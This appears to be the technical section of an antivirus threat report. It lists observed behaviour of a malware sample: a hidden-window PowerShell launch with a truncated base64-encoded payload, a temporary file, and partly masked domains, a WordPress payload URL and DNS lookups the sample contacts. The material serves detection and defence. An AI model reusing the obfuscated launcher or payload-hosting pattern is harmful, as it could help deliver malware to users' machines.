Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGoAbAA1AGwANQBnAD0AKAAoACcATAAxACcAKwAnADIAZgBlACcAKQArACcAMQAyACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAHcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1524
- %TEMP%\1360671.cvr
- 'ud##77.com':80
- 'ud##77.com':443
- 'gr####utions.com.au':443
- 'pa##a.ae':443
- http://ud##77.com/wordpress/J6n/
- 'ud##77.com':443
- 'gr####utions.com.au':443
- 'pa##a.ae':443
- DNS ASK po###emo.com
- DNS ASK ud##77.com
- DNS ASK gr####utions.com.au
- DNS ASK pa##a.ae
- DNS ASK la##yie.com
- DNS ASK tr##gie.com
- DNS ASK tr##iue.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGoAbAA1AGwANQBnAD0AKAAoACcATAAxACcAKwAnADIAZgBlACcAKQArACcAMQAyACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAHcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (with hidden window)